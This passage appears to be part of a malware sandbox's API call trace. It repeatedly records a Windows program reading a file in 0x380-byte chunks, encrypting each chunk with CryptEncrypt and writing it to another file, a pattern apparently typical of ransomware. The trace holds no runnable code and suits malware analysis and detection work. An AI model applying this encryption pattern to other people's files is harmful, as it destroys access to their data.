nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.365] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.365] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.365] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.365] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.365] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.365] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.365] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.365] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.365] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.365] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.365] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.365] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.365] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.365] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.366] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.366] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.366] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.366] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.366] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.367] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.367] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.367] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.367] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.367] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.367] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.367] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.367] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.367] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.367] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.367] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.367] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.367] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.368] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.368] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.368] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.368] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.368] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.368] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.369] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.369] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.369] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.369] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.369] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.369] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.369] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.369] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.369] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.369] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.369] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.369] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.370] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.370] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.370] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.370] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.370] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.370] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.371] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.371] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.371] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.371] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.371] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.371] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.371] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.371] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.371] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.371] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.371] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.371] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.372] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.372] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.372] 